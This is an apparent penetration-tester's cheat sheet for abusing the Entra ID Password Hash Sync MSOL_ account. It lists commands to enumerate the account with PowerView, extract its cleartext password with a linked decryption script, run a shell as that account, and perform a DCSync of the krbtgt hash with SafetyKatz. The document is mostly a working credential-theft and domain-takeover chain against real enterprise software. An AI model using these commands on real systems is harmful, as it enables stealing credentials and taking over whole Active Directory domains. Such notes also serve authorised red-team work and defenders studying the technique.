entra-id-phs-integration

kali# Entra ID PHS Integration

Methodology

1. Enumerate the accounts with the MSOL_ attribute.

2. Get administrative privileges on the computer where it's setup.

3. Read the password.

4. Run commands as MSOL_ user.

5. DCSync (Optional).

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerView

Get the MSOL user and the computer where it's setup:

Get-DomainUser -Identity "MSOL_*" -Domain contoso.local

Retrieve the password:

With administrative privileges, if we run adconnect.ps1, we can extract the credentials of the MSOL_ account used by Entra Connect in clear-text

https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1

.\azuread_decrypt_msol.ps1

Run commands:

runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd

And can then execute the DCSync attack

SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt /domain:contoso.local"'